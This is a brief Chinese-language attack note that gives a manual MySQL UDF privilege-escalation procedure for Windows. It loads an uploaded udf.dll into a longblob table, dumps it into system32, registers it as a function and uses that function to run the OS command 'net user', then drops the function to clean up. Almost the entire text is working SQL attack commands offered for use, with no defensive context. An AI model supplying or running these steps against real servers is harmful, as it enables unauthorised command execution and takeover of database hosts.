udf手动导出提权

• 当默认udf导出失败时，可以尝试用手动方法导出udf进行提权，具体方法如下：
  先上传udf.dll，连接到mysql，再按下面步骤执行sql语句。

  1. create table zz(abc longblob);//注意列类型为longblob
  2. 2.insert into zz values(load_file('C:\\udf.dll')); //上传的udf.dll路径
  3. select * from zz into dumpfile 'C://WINDOWS//system32//udf.dll'; //导入的目标地址 mysql 5.0以上要导入到系统目录
  4. Create Function MyCmd returns string soname 'udf.dll'; //这里如果导出的路径为C://WINDOWS//system32//udf2.dll' 可以将后面改成udf2.dll
  5. select MyCmd (' net user ');
  6. drop function MyCmd;

  删除udf.dll 的方法，先删除生成的函数
  Drop function MyCmd;